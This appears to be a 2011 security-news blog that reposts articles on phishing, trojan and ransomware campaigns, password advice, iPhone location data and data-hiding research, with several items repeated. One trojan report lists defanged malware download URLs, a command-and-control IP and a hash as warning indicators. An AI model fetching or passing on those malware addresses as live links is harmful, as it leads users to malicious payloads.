All iSpy conspiracy bullshit aside, you are probably more interested in what your iPhone does with location data. Well, if you opt-in to the iPhone's location services, detailed—but anonymized—location data is transmitted back to Apple on a regular basis.
Gadget Lab reminds us of a letter Apple general counsel Bruce Sewell sent to a couple of Congressman last year explaining how and why Apple collects location data. (Wired's hosting the letter here.) Basically, if you've got Location Services turned on, whenever you request current location data (like via an app), Apple collects info about nearby cell towers and Wi-Fi hotspots. If you happen to be using GPS, it'll collect the GPS coordinates too. That data's then transmitted to Apple every 12 hours over "secure" Wi-Fi networks, anonymized with a "random identification number generated every 24 hours by an iOS device," so neither Apple nor anybody can personally identify you.
If you remember, Apple started doing its own location services last year (from iOS 3.2 onward), instead of using Google or Skyhook's location data. So, it needs to build and maintain its own database of known tower locations and Wi-Fi hotspots—that's where this info comes in. You're an official location scout for Apple, in other words. When your device asks where it's at, it hits up this database before zeroing in with GPS.
Not too crazy, though it doesn't make the ease with which your location history can be extracted from your Mac or iPhone any less unnerving. Also, it makes the lack of a purge after the data's transmitted to Apple seem more and more like a mere oversight.
More on this is at Gadget Lab: [Gadget Lab] via [Gizmodo]
Thursday, 28 April 2011
Hide Your Data Through Fragmentation, Not Encryption
The thing about data encryption is that it's basically a flashing neon sign indicating "SENSITIVE DATA HERE!" A new technique lets you secure your data by customizing the way that data is fragmented across your drive.
The new method uses special software to place data on specific parts of your hard disc using a code instead of the disc drive controller chip. Your sensitive data is encoded into a binary value and used to modify the fragmentation patterns of an existing file. The conversion is based on whether or not sequential clusters of data are stored adjacently. If they are, it represents a binary 1; if they aren't, it's a 0.
The system was developed by Hassan Khan and his colleagues at the University of Science and Technology in Islamabad, Pakistan. They say that it can hide a 20MB message on a 160GB hard drive, and detecting its existence would be "unreasonably complex." This is important because the normal methods of encryption are so well known that they're dead giveaways that something is amiss, and often the fact that you have something to hide can be just as damning as the information itself.
This isn't a permanent solution for data security, of course. Now that this type of camouflage is in the field, it won't be long until a detection method is reverse engineered. But research like this is important for everyone—journalists, dissidents, LOIC enthusiasts—who thinks they are at risk of having their drives seized and searched for incriminating information.
[ScienceDirect via New Scientist via Gizmodo]
Tuesday, 12 April 2011
Corrupt bank worker jailed over Trojan-powered tax scam
A former local business manager at a bank who participated in a £3.2m self assessment tax fraud was jailed for three years and three months on Friday.
Nikola Novakovic, 34, conspired with Oleg Rozputnii, 28, to register over 1,050 fictitious taxpayers on the Income Tax Self Assessment system. The pair claimed fraudulent tax refunds under assumed names before laundering the proceeds of the scam via 200 fraudulent bank accounts.
Personal details needed to pull off the racket were extracted from the computers of consumers using an unspecified computer virus. Rozputnii, an illegal immigrant from the Ukraine, used numerous false identities to help commit the fraud, which also involved Dmytro Shepel, 26, a Ukrainian, also from London.
Joe Rawbone, assistant director of HMRC Criminal Investigation, said: "These men ran an audacious scam stealing millions of pounds. They set up hundreds of false bank accounts using viruses to hack into personal computers to gain information. They used their illegal profits to fund lavish lifestyles, buying performance cars including Porches, Mercedes and Jaguars. HMRC takes tax fraud extremely seriously and we will recover any financial gain from this criminal activity."
The scam netted £3.2m between January 2008 and September 2010 when the racket was uncovered following a lengthy investigation by HM Revenue & Customs (HMRC).
Sentencing, Mr Recorder Singh QC said that Novakovic "had abused his position with the bank" as part of a "sophisticated and orchestrated fraud".
Novakovic and Rozputnii pleaded guilty to cheating the public revenue in March. Rozputnii, the main mover behind the scam, was jailed for three years and nine months on Friday. Shepel was sentenced to three-and-a-half years at an earlier hearing in August 2010.
Pictures of the subjects and their cars can be found in a HMRC statement on the case here. ®
[TheRegister]
Nikola Novakovic, 34, conspired with Oleg Rozputnii, 28, to register over 1,050 fictitious taxpayers on the Income Tax Self Assessment system. The pair claimed fraudulent tax refunds under assumed names before laundering the proceeds of the scam via 200 fraudulent bank accounts.
Personal details needed to pull off the racket were extracted from the computers of consumers using an unspecified computer virus. Rozputnii, an illegal immigrant from the Ukraine, used numerous false identities to help commit the fraud, which also involved Dmytro Shepel, 26, a Ukrainian, also from London.
Joe Rawbone, assistant director of HMRC Criminal Investigation, said: "These men ran an audacious scam stealing millions of pounds. They set up hundreds of false bank accounts using viruses to hack into personal computers to gain information. They used their illegal profits to fund lavish lifestyles, buying performance cars including Porches, Mercedes and Jaguars. HMRC takes tax fraud extremely seriously and we will recover any financial gain from this criminal activity."
The scam netted £3.2m between January 2008 and September 2010 when the racket was uncovered following a lengthy investigation by HM Revenue & Customs (HMRC).
Sentencing, Mr Recorder Singh QC said that Novakovic "had abused his position with the bank" as part of a "sophisticated and orchestrated fraud".
Novakovic and Rozputnii pleaded guilty to cheating the public revenue in March. Rozputnii, the main mover behind the scam, was jailed for three years and nine months on Friday. Shepel was sentenced to three-and-a-half years at an earlier hearing in August 2010.
Pictures of the subjects and their cars can be found in a HMRC statement on the case here. ®
[TheRegister]
Wireless Security – Choosing the Best Wi-Fi Password
Running through some tests for an upcoming wireless security book and it really brings home the importance of choosing a good password for your Wi-Fi network.
Currently, the best security setting for your home or office Wi-Fi is WPA2.
WPA2 Enterprise is the best if your organization supports it, but WPA2 Personal is great for home and small offices.
Do not use WEP. It has been cracked a long time ago, and an attacker does not even have to crack it, the WEP key can be passed just like NTLM passwords.
The most common technique used for WPA/WPA2 hacking is a dictionary attack.
The attacker captures a WPA password handshake and passes this through a program that will try numerous passwords from a word list.
Here is the key, if the password is not in the word list, they hacker does not get into your system.
Using a lengthy complex password goes a long way in keeping your WPA2 network secure.
A combination of upper/lower case letters, numbers and special characters is the best bet.
Some prefer using a short sentence that means something to them, while replacing some of the letters with numbers and adding in a few extra characters.
I just ran one common word list attack against my WPA2 password. It tried over 1 million word combinations from the list with no dice. My network is still secure!
The more un-dictionary looking your password is, the better!
Building More Secure Passwords
The problem of weak, guessable security passwords isn’t a new one, but it’s not going away.
In fact it’s getting worse, despite pleading from IT professionals to choose tough-to-guess passwords.
Workers are still disconcertingly likely to come up with something like “password1!” or simply attach a few numbers like “123,” to the end of a word.
As users have to create several passwords for different systems and change them every 60 or 90 days, it’s little wonder they default to the least complicated password their systems allow and make only minor variations when forced to change them.
Unfortunately, such passwords are easy to guess. At the other end of the scale are passwords software programs randomly generated, which are difficult for users to remember (leading them to write these passwords down which defeats the effort).
In a recent paper coauthored by Cisco, Florida State University, and Redjack LLC, researchers examined how different password requirements affect password strength — such as requiring a minimal password length or the addition of a special character.
The researchers discovered that such policies usually don’t provide greater security since hackers are well-versed in these tactics and can use them to guess passwords and access accounts.
For instance, hackers know that when users are required to use a special character in a password, they can simply append that character to the end of the password.
A better practice say the researchers, is an external password creation tool that changes a password after it’s created to add a guaranteed amount of randomness — for example, adding two random digits to the end of a password.
This allows users to choose a password that they are likely to remember while making it difficult for hackers to guess.
Another option is to implement a “judgmental” password policy which will reject a password instantly based on its estimated strength and suggest a stronger one.
Or administrators could implement password protection software, which lets users remember only one strong master password, leaving the application to store encrypted passwords.
Excerpted and adapted from the Cisco 2010 Annual Security Report
[infosecIsland]
In fact it’s getting worse, despite pleading from IT professionals to choose tough-to-guess passwords.
Workers are still disconcertingly likely to come up with something like “password1!” or simply attach a few numbers like “123,” to the end of a word.
As users have to create several passwords for different systems and change them every 60 or 90 days, it’s little wonder they default to the least complicated password their systems allow and make only minor variations when forced to change them.
Unfortunately, such passwords are easy to guess. At the other end of the scale are passwords software programs randomly generated, which are difficult for users to remember (leading them to write these passwords down which defeats the effort).
In a recent paper coauthored by Cisco, Florida State University, and Redjack LLC, researchers examined how different password requirements affect password strength — such as requiring a minimal password length or the addition of a special character.
The researchers discovered that such policies usually don’t provide greater security since hackers are well-versed in these tactics and can use them to guess passwords and access accounts.
For instance, hackers know that when users are required to use a special character in a password, they can simply append that character to the end of the password.
A better practice say the researchers, is an external password creation tool that changes a password after it’s created to add a guaranteed amount of randomness — for example, adding two random digits to the end of a password.
This allows users to choose a password that they are likely to remember while making it difficult for hackers to guess.
Another option is to implement a “judgmental” password policy which will reject a password instantly based on its estimated strength and suggest a stronger one.
Or administrators could implement password protection software, which lets users remember only one strong master password, leaving the application to store encrypted passwords.
Excerpted and adapted from the Cisco 2010 Annual Security Report
[infosecIsland]
DHL Express spam campaign leads to fake AV
A new spam campaign impersonating the popular mail service DHL Express is currently underway, warn Bkis researchers.
The email in question looks like this:
Once the user downloads and opens the attachment, the worm contained in it downloads a fake AV solution from a server located in Russia.
The fake AV ("XP Home Security") immediately starts its work and tries to trick the user into buying a full version that will supposedly remove all the infections it found.
Users are warned to be careful when reviewing emails purportedly coming from DHL express or any of the other well-known express mail services - more often than not, they are fake emails containing malicious attachments.
[net-security]
The email in question looks like this:
Once the user downloads and opens the attachment, the worm contained in it downloads a fake AV solution from a server located in Russia.
The fake AV ("XP Home Security") immediately starts its work and tries to trick the user into buying a full version that will supposedly remove all the infections it found.
Users are warned to be careful when reviewing emails purportedly coming from DHL express or any of the other well-known express mail services - more often than not, they are fake emails containing malicious attachments.
[net-security]
Ransom Trojan locks Windows
Ransomware is slowly becoming quite a problem, and the latest one spotted by F-Secure tries a rather innovative approach: it locks the victims out of Windows and doesn't allow them boot Windows in either normal or Safe mode until they have entered a code to "complete activation":
Posing as a legitimate Microsoft action, the scammers claim that the activation is "absolutely free and is simply a formality." The victims are offered six phone numbers to which they can place a call, enter a given code and once they receive an activation key, enter it and gain access to their computer again.
The note says that the call from the victim's county is free of charge, but that's a complete lie. The calls purportedly go to Microsoft call centers, but these numbers belong to rogue call centers seemingly located in countries such as the Dominican Republic or Somalia - i.e. countries with expensive phone rate.
But, these rogue call centers are actually located in countries the calls to which are much cheaper than to the previously mentioned ones, so the scammers and the owners of these call centers split the difference in the fee.
F-Secure's Mikko Hypponen demonstrated how the scam works, and says that no matter how many times and to which of the offered numbers one makes the call, one is forced to listen to a four minutes long prerecorded message that reveals at the end always the same activation code: 1351236.
You Windows can be unblocked only by entering the code or formatting your hard drive and restoring its contents from your backup - there is no other way.
[net-security]
Posing as a legitimate Microsoft action, the scammers claim that the activation is "absolutely free and is simply a formality." The victims are offered six phone numbers to which they can place a call, enter a given code and once they receive an activation key, enter it and gain access to their computer again.
The note says that the call from the victim's county is free of charge, but that's a complete lie. The calls purportedly go to Microsoft call centers, but these numbers belong to rogue call centers seemingly located in countries such as the Dominican Republic or Somalia - i.e. countries with expensive phone rate.
But, these rogue call centers are actually located in countries the calls to which are much cheaper than to the previously mentioned ones, so the scammers and the owners of these call centers split the difference in the fee.
F-Secure's Mikko Hypponen demonstrated how the scam works, and says that no matter how many times and to which of the offered numbers one makes the call, one is forced to listen to a four minutes long prerecorded message that reveals at the end always the same activation code: 1351236.
You Windows can be unblocked only by entering the code or formatting your hard drive and restoring its contents from your backup - there is no other way.
[net-security]
“Facebook Support. Your password has been changed!” contains trojan
MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facebook Support. Your password has been changed! ID09687″. Note that the number may change with each email.
The email is send from the spoofed addresses:
account@facebook.com
manager@facebook.com
The message has the following body:
The trojan is known as Gen:Heur.VIZ.2 (BitDefender), Mal/FakeAV-JX (Sophos), Trojan.Generic.Bredolab-2 (ClamAV).
The following files will be created:
%System%\document.doc
Several Windows registry changes will be exectued and the trojan can establish connection with the IP 193.106.34.20 on port 80.
Data can be obtained from following URLs:
Virus Total permalink and MD5: ecc2d442886b7296b5bd7eaeaae0bcea.
[ComputerSecurityArticles]
The email is send from the spoofed addresses:
account@facebook.com
manager@facebook.com
The message has the following body:
Dear user of FaceBook.The attached ZIP file has the name New_Password_IN04393.zip, note that the number at the end will change, and contains the 33 kB large file New_Password.exe.
Your password is not safe!
To secure your account the password has been changed automatically.
Attached document contains a new password to your account and detailed information about new security measures.
Thank you for your attention,
Your Facebook
The trojan is known as Gen:Heur.VIZ.2 (BitDefender), Mal/FakeAV-JX (Sophos), Trojan.Generic.Bredolab-2 (ClamAV).
The following files will be created:
%System%\document.doc
Several Windows registry changes will be exectued and the trojan can establish connection with the IP 193.106.34.20 on port 80.
Data can be obtained from following URLs:
- hxxp://profmiale.ru/TGQW4nHJOS/document.doc
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=8
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=9
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=uploader
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=grabbers
- hxxp://profmiale.ru/TGQW4nHJOS/grabbers.php
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=0
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=1
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=2
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=3
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=4
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=5
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=6
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=7
Virus Total permalink and MD5: ecc2d442886b7296b5bd7eaeaae0bcea.
[ComputerSecurityArticles]
Facebook Scam Alert: ‘Everyone do check what she did on cam’ Spreading
We’re monitoring an on-going Facebook scam campaign that seems to be spreading faster than any campaign we’ve come across before.
The scam starts with a user being tagged in a photo such as the one above. The photograph is posted in an album called “BBC News” to give it authenticity. It typically has over 100+ people tagged in it and it contains the following text: “Everyone do check what she did on cam …. — [URL]”
The short URL typically redirects the users to a .info domain, which then takes the user to a Facebook Application Installation page.
When a user allows the application, the scam continues with that user posting the same photo, tagging over 100 users in it and helping it propagate.
Users are also redirected to another .info domain, which contains a video that is gated by another form of a survey scam:
The scammers have managed to be nimble enough to switch the campaign from one Short URL service to another. At first, this was spreading via Bit.ly:
Over the course of an hour, this particular URL received over 80,000 clicks. However, the scam has since shifted to the Goo.gl Short URL service:
In less than an hour, the goo.gl version of the scam has reached over 125,000 clicks.
Recommendations: First and foremost, don’t click on the link included in the description of the photograph. One of the things you can do to prevent your friends/family members from falling for this is to untag yourself from the photograph:
Additionally, you can report the image so that Facebook can take action against it (this is an important step):
If you’ve been tricked into installing the application, visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites. Locate the Rogue Application under the Apps and Websites section (typically has the word “news” in it). Once you’ve located it under the ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.
Scammers are finding new ways to trick users. The key here is to be aware and to keep your friends and family members in the loop about scams like this one. We can’t stress that enough.
Update: The goo.gl short URL has now logged over 220,000 clicks.
Additionally, the scammers have also moved to TinyURL:
What did this girl do on her webcam?
An example of what it would look like to see your friends tagged in this photo
Short URL redirects to the following Application Install Page
Over 100 Friends tagged in this scam
Facebook Verification Spam Bot – Freudian Slip?
Bit.ly Stats as this scam was first spreading
Goo.gl Short URL Statistics for this scam
Recommendations: First and foremost, don’t click on the link included in the description of the photograph. One of the things you can do to prevent your friends/family members from falling for this is to untag yourself from the photograph:
You can untag yourself from any photo
You can help prevent this scam from spreading by reporting it
Scammers are finding new ways to trick users. The key here is to be aware and to keep your friends and family members in the loop about scams like this one. We can’t stress that enough.
Update: The goo.gl short URL has now logged over 220,000 clicks.
Over 220,000 clicks on the goo.gl short URL
GCHQ says BlackBerry is safest
The UK's National Technical Authority for Information Assurance at GCHQ (CESG) has published smartphone security guidance for public sector workers.
The advice published today covers various phones, including the Apple iPhone, Windows Phone 7 devices, Nokia hardware and BlackBerrys.
Four security procedures documents have been produced, outlining how to best secure any mobile deployment for UK Government departments and organisations on those platforms.
“These security procedures cover architectural issues (such as recommended network layout, recommendations for operational monitoring), configuration advice, user education and training suggestions, and information on residual risks that senior risk owners will need to take into account,” a CESG spokesperson told IT PRO.
“The publication of this risk management advice and guidance is intended to ensure all UK Government organisations have access to the information they need to take educated risk management decisions when deploying remote working solutions using smartphones.”
CESG worked with the telecoms industry to produce the report on how to secure smartphones for remote working, covering lower risk situations.
The guidance document itself was not available to the press.
CESG claimed the document will help many parts of the public sector work more efficiently and effectively, in turn saving money for the taxpayer.
As for more handling serious data, however, the GCHQ body said the only way was BlackBerry.
“The BlackBerry Enterprise Solution from Research In Motion remains the only smartphone system to have been formally evaluated by CESG and is approved to protect material classified up to and including ‘restricted,’” CESG said.
RIM was unsurprisingly buoyant about that particular comment, as a host of supporters talked about BlackBerry security credentials.
“The BlackBerry platform remains, in my opinion, the leader in this respect, providing the highest levels of assurance without the added cost or complexity of needing to bring third-party software into the equation,” said Nick McQuire, director for enterprise mobility at analyst house IDC.
BlackBerry devices are not infallible of course, as the recent Pwn2Own contest highlighted when a Torch 9800 was successfully hacked.
“The reality is that BlackBerry does have more enterprise features and controls such as remote kill, email retention, guaranteed message deliver with application and encryption controls,” said Ron Gula, chief executive (CEO) of Tenable Network Security.
“However, while this is important, a lot of it is just details, and we'll probably see some leapfrogging between the various mobile vendors as they get bitten and react.”
[ITPro]
Friday, 1 April 2011
Hackers Drain Cash From iTunes Accounts
Hacked accounts and fraudulent purchases are leaving iTunes users singing a sad song — again.
Crafty computer criminals are compromising users’ iTunes accounts and purchasing hundreds of dollars worth of music, apps, gift cards, ringtones and games, the security firm Kaspersky Lab reported.
The hacks, discussed in detail in an Apple Discussions blog and an “iTunes Account Hacked!” Facebook page, all share similar characteristics: the assailants gain access to the victims’ credit card information, modify the billing address and use the stolen info to make the fraudulent purchases.
“Another victim! My iTunes was drained of $29.98 on 3/25/11 at midnight,” wrote coupster7 on the Apple blog. “They also changed my billing address city/state to Towson, Md. Reported to apple.”
Unfortunately for users of the ubiquitous music platform, the iTunes hacks have been occurring since early 2010. Unlike coupster7, some attacks do serious damage to victims’ wallets.
On the Facebook page where consumers air hacking grievances, iTunes customer Jeff Tarsha wrote in May 2010, “Just happened to me. $200 out of bank account for stupid items. I think it was iTunes screw up thought because it happened right after placing an order for $1.99 cent song. I think it got messed up with somebody else’s order, but iTunes could care less and instantly blames me for not protecting my data. WTF?”
Hackers have long sought out iTunes as a target because of its popularity and the sensitive banking information users keep stored in their accounts.
Apple has yet to release a public statement about the compromised iTunes accounts. They did not return a call for comment.
[SecurityNewsDaily]
Crafty computer criminals are compromising users’ iTunes accounts and purchasing hundreds of dollars worth of music, apps, gift cards, ringtones and games, the security firm Kaspersky Lab reported.
The hacks, discussed in detail in an Apple Discussions blog and an “iTunes Account Hacked!” Facebook page, all share similar characteristics: the assailants gain access to the victims’ credit card information, modify the billing address and use the stolen info to make the fraudulent purchases.
“Another victim! My iTunes was drained of $29.98 on 3/25/11 at midnight,” wrote coupster7 on the Apple blog. “They also changed my billing address city/state to Towson, Md. Reported to apple.”
Unfortunately for users of the ubiquitous music platform, the iTunes hacks have been occurring since early 2010. Unlike coupster7, some attacks do serious damage to victims’ wallets.
On the Facebook page where consumers air hacking grievances, iTunes customer Jeff Tarsha wrote in May 2010, “Just happened to me. $200 out of bank account for stupid items. I think it was iTunes screw up thought because it happened right after placing an order for $1.99 cent song. I think it got messed up with somebody else’s order, but iTunes could care less and instantly blames me for not protecting my data. WTF?”
Hackers have long sought out iTunes as a target because of its popularity and the sensitive banking information users keep stored in their accounts.
Apple has yet to release a public statement about the compromised iTunes accounts. They did not return a call for comment.
[SecurityNewsDaily]
How to Create and Remember Super-Secure Passwords
How many websites did you visit today that required a password? Probably quite a few.
Do you need a password to access data or email at work? You likely do.
In fact, you may have even needed a password to log on to the computer you’re reading this on right now.
Passwords are the front line of defense in protecting the data on your computer. They keep your kids from hijacking your Twitter account, and keep cybercriminals from gaining access to your bank account.
The problem is that because we need so many passwords today, many of us take the easy way out. We either use the same password for everything, or use very simple, easy-to-remember passwords.
And that’s where we can get into trouble.
The risks of weak or multiple-use passwords
“Let’s say you fall for a phishing attack on Facebook,” explained Beth Jones, senior threat researcher for the information-security firm SophosLabs North America. “They can see your email address and try that same password there.
“If you have sensitive information in your email, such as bank statements or credit-card statements, then the attacker can try that password to access bank accounts or credit-card accounts as well,” Jones said.
“They would have several key pieces of [personal] information… so in theory they could try the ‘forgot username’ on other accounts, such as Twitter, or online games,” she said. “You can see how this snowballs quickly.”
Not only should you have a unique password for each site you log into online, but, as Gunther Ollmann, vice president of research at the Atlanta-based computer-security firm Damballa, pointed out, you should also avoid recycling old passwords.
“Criminals — and unethical web masters — often try to use the passwords that have been taken from one site and use them against other sites, especially if your email address is also known to them,” Ollman explained.
“Each website or application you use should have a different password, and ideally you should not use a predictable algorithm for generating them,” he said. “For example, a bad practice is to use a password that contains the particular website’s name or address in it.”
How to create perfect passwords
So what makes a good, strong password?
“Password strength is measured by two characteristics — length and complexity,” said Josh Shaul, chief technology officer with New York-based Application Security, Inc. and author of Practical Oracle Security: Your Unauthorized Guide to Relational Database Security. “In general, the longer the password, the more difficult it is to guess and the stronger it is.”
Password complexity, he added, means avoiding passwords that can be easily guessed.
“The easiest passwords to remember are simple words, places, dates or easy-to-type text strings,” Shaul said. “Favorite sports teams, cities, names, birthdays and even strings like ‘12345‘ or ‘qwerty‘ are very commonly used. These are all weak passwords.”
Most experts agree on the basics of creating strong passwords. Here are some tips from the Identity Theft Resource Center:
For example, the phrase “I hate to work late” could become “iH82wkl8.”
Or tweak that formula and don’t abbreviate all the words. "This little piggy went to market" might become "tlpWENT2m."
Not sure, even after following those tips, whether your password is strong enough? Go to one of the many websites that will check it for you.
Can’t think of a good password? There are also websites that generate them.
Should you write them down?
So if we need a unique, strong password for nearly everything we do online — check multiple email accounts, use Facebook and Twitter, make comments on CNN, buy something from Amazon — how can we remember them all? Is it okay to write them down somewhere?
Several years ago, the conventional wisdom was to never write down passwords — but that was when most of us only had a few to remember.
Some experts have since changed their minds.
“With today's threat landscape being dominated by password-stealing malware, physically writing down your passwords is becoming more acceptable,” Damballa’s Ollman said.
“The probability of someone breaking into your house and stealing your written-down passwords is considerably more remote than the 1-in-3 to 1-in-4 probability that your computer will fall to a criminal’s malware,” Ollman said.
Jones of SophosLabs sticks to the old advice — don’t write them down.
“This is really not a great idea, particularly for work,” Jones said. “Physical security is just as important as online security.
“Anyone walking by could see the sticky note next to your machine and then break into your accounts (especially if you use the same password for everything),” she added. “The risk is even greater if, as a user, you log into more than one location and have your password written at all those locations.”
Web browsers often ask if they can remember your password for you. Is that safer than writing down your password?
“For some passwords, it may be okay to let the browser remember your password on your personal laptop or home PC,” said Chris Burchett, founder and chief technology officer with Addison, Texas-based information-security firm Credant.
“In general, if the information on the website that requires your password is what you consider to be public, then it may be okay to let the browser remember the password,” Burchett said. “But be careful.
Never let the browser remember passwords to banking websites or other sites where private personal identity information is used or available.”
“Also be careful when using a public-kiosk computer like the ones at the airport. Never let browsers on computers you don't own store passwords,” he added. “In fact, it would be best not to log into any website requiring a password from a computer you don't own.”
Password-management software
Instead, the experts suggest using third-party password-management software, which stores all your passwords in one place and protects them with one very strong master password — the only one you’ll have to remember.
“Managing passwords is a challenge because there are so many online accounts requiring passwords these days,” Burchett said. “Using a password manager to securely generate, store, rotate and supply passwords on demand may be worth considering as long as you remember to make the master password strong enough.”
There are dozens of password managers, both free and inexpensive (none cost more than $30). Some of the better-known ones include Web Confidential, LastPass, KeePass and its Mac/Linux sibling KeePassX. Some run on PCs, others on smartphones, while some are browser plug-ins.
As for the password managers that come with browsers, most of them aren’t very secure. Only Opera and Mozilla Firefox use master passwords, and Firefox’s is turned off by default. (Here’s how to turn it on.)
Now that you’ve read all this, do yourself a favor this weekend. Go through all your online accounts and use these tips to create strong, unique passwords for each one, and then use a password manager to remember them all.
It’ll take less time than you think. Next time a friend or relative has an email account hijacked or gets charged for dozens of iTunes songs he didn’t buy, you’ll be glad you did.
[SecurityNewsDaily]
Do you need a password to access data or email at work? You likely do.
In fact, you may have even needed a password to log on to the computer you’re reading this on right now.
Passwords are the front line of defense in protecting the data on your computer. They keep your kids from hijacking your Twitter account, and keep cybercriminals from gaining access to your bank account.
The problem is that because we need so many passwords today, many of us take the easy way out. We either use the same password for everything, or use very simple, easy-to-remember passwords.
And that’s where we can get into trouble.
The risks of weak or multiple-use passwords
“Let’s say you fall for a phishing attack on Facebook,” explained Beth Jones, senior threat researcher for the information-security firm SophosLabs North America. “They can see your email address and try that same password there.
“If you have sensitive information in your email, such as bank statements or credit-card statements, then the attacker can try that password to access bank accounts or credit-card accounts as well,” Jones said.
“They would have several key pieces of [personal] information… so in theory they could try the ‘forgot username’ on other accounts, such as Twitter, or online games,” she said. “You can see how this snowballs quickly.”
Not only should you have a unique password for each site you log into online, but, as Gunther Ollmann, vice president of research at the Atlanta-based computer-security firm Damballa, pointed out, you should also avoid recycling old passwords.
“Criminals — and unethical web masters — often try to use the passwords that have been taken from one site and use them against other sites, especially if your email address is also known to them,” Ollman explained.
“Each website or application you use should have a different password, and ideally you should not use a predictable algorithm for generating them,” he said. “For example, a bad practice is to use a password that contains the particular website’s name or address in it.”
How to create perfect passwords
So what makes a good, strong password?
“Password strength is measured by two characteristics — length and complexity,” said Josh Shaul, chief technology officer with New York-based Application Security, Inc. and author of Practical Oracle Security: Your Unauthorized Guide to Relational Database Security. “In general, the longer the password, the more difficult it is to guess and the stronger it is.”
Password complexity, he added, means avoiding passwords that can be easily guessed.
“The easiest passwords to remember are simple words, places, dates or easy-to-type text strings,” Shaul said. “Favorite sports teams, cities, names, birthdays and even strings like ‘12345‘ or ‘qwerty‘ are very commonly used. These are all weak passwords.”
Most experts agree on the basics of creating strong passwords. Here are some tips from the Identity Theft Resource Center:
- A password should contain at least eight characters (some experts say 10 or 14 characters is the minimum).
- The password should have at least three of the four following types of characters — upper-case letters (ABC), lower-case letters (abc), numerals (123), and punctuation marks or other special characters (!#$%&*_=+? ).
- If you’re using only one capital letter or special character, don’t make it the first or last character in the password.
- Avoid common names, slang words or any words in the dictionary. Computers can run through entire dictionaries in minutes.
- Don’t include any part of your name or any part of your email addresses.
- Choose an especially strong password for websites that hold especially sensitive personal information — for example, banks or online retailers that store your credit-card information.
- Don’t ever refer to anything that can be learned from your social networking profiles or an Internet search. In other words, don’t make it your favorite band or movie, your pet’s name, your nickname, your phone number or, especially, your birth date.
For example, the phrase “I hate to work late” could become “iH82wkl8.”
Or tweak that formula and don’t abbreviate all the words. "This little piggy went to market" might become "tlpWENT2m."
Not sure, even after following those tips, whether your password is strong enough? Go to one of the many websites that will check it for you.
Can’t think of a good password? There are also websites that generate them.
Should you write them down?
So if we need a unique, strong password for nearly everything we do online — check multiple email accounts, use Facebook and Twitter, make comments on CNN, buy something from Amazon — how can we remember them all? Is it okay to write them down somewhere?
Several years ago, the conventional wisdom was to never write down passwords — but that was when most of us only had a few to remember.
Some experts have since changed their minds.
“With today's threat landscape being dominated by password-stealing malware, physically writing down your passwords is becoming more acceptable,” Damballa’s Ollman said.
“The probability of someone breaking into your house and stealing your written-down passwords is considerably more remote than the 1-in-3 to 1-in-4 probability that your computer will fall to a criminal’s malware,” Ollman said.
Jones of SophosLabs sticks to the old advice — don’t write them down.
“This is really not a great idea, particularly for work,” Jones said. “Physical security is just as important as online security.
“Anyone walking by could see the sticky note next to your machine and then break into your accounts (especially if you use the same password for everything),” she added. “The risk is even greater if, as a user, you log into more than one location and have your password written at all those locations.”
Web browsers often ask if they can remember your password for you. Is that safer than writing down your password?
“For some passwords, it may be okay to let the browser remember your password on your personal laptop or home PC,” said Chris Burchett, founder and chief technology officer with Addison, Texas-based information-security firm Credant.
“In general, if the information on the website that requires your password is what you consider to be public, then it may be okay to let the browser remember the password,” Burchett said. “But be careful.
Never let the browser remember passwords to banking websites or other sites where private personal identity information is used or available.”
“Also be careful when using a public-kiosk computer like the ones at the airport. Never let browsers on computers you don't own store passwords,” he added. “In fact, it would be best not to log into any website requiring a password from a computer you don't own.”
Password-management software
Instead, the experts suggest using third-party password-management software, which stores all your passwords in one place and protects them with one very strong master password — the only one you’ll have to remember.
“Managing passwords is a challenge because there are so many online accounts requiring passwords these days,” Burchett said. “Using a password manager to securely generate, store, rotate and supply passwords on demand may be worth considering as long as you remember to make the master password strong enough.”
There are dozens of password managers, both free and inexpensive (none cost more than $30). Some of the better-known ones include Web Confidential, LastPass, KeePass and its Mac/Linux sibling KeePassX. Some run on PCs, others on smartphones, while some are browser plug-ins.
As for the password managers that come with browsers, most of them aren’t very secure. Only Opera and Mozilla Firefox use master passwords, and Firefox’s is turned off by default. (Here’s how to turn it on.)
Now that you’ve read all this, do yourself a favor this weekend. Go through all your online accounts and use these tips to create strong, unique passwords for each one, and then use a password manager to remember them all.
It’ll take less time than you think. Next time a friend or relative has an email account hijacked or gets charged for dozens of iTunes songs he didn’t buy, you’ll be glad you did.
[SecurityNewsDaily]
Under the phishing filters' radar
Criminals are reportedly using a new phishing technique that allows them to bypass the fraud warnings issued by modern browsers such as Firefox and Chrome. On its blog, security firm M86Security reports that the trick involves attaching an HTML document instead of sending a link. It remains unclear how many users have become victims so far.Email recipients opening the HTML document in their browsers are, for example, presented with a bogus PayPal form with the usual request to enter their access data due to alleged security issues. As the form is being processed locally on the user's computer, the phishing filter doesn't issue a warning because it only filters external URLs. A click on the "Submit" button then transmits the entered data to a PHP script on a (hacked) server using a POST request. According to M86Security, the browser doesn't warn about this either.
While browsers should at least warn users when sending the data, M86Security stated two potential reasons why they won't: as users don't see the URL they access via POST requests, they can't report it, and consequently the URL is missing in the browser filter's blacklist. The company added that most users can't make anything of the HTML source code that is attached to the email.
Secondly, M86Security said that URLs which lead to a PHP script are very difficult to classify as phishing sites. It is reportedly hard to identify a phishing site without the accompanying HTML code which could, for instance, reveal whether a site pretends to be a banking site. This has apparently caused months-old phishing campaigns to remain undetected. The security firm didn't state whether its assessment only refers to the filter lists maintained for Chrome, Firefox and other browsers, or whether it also includes those of the AV vendors, who maintain separate lists for their own filter products.
[H-Online]
6 Steps to Staying Safe on Social Networks
To get a good sense of why people enjoy online social networking, visit Twitter during the baseball playoffs or during a live broadcast of “American Idol.”
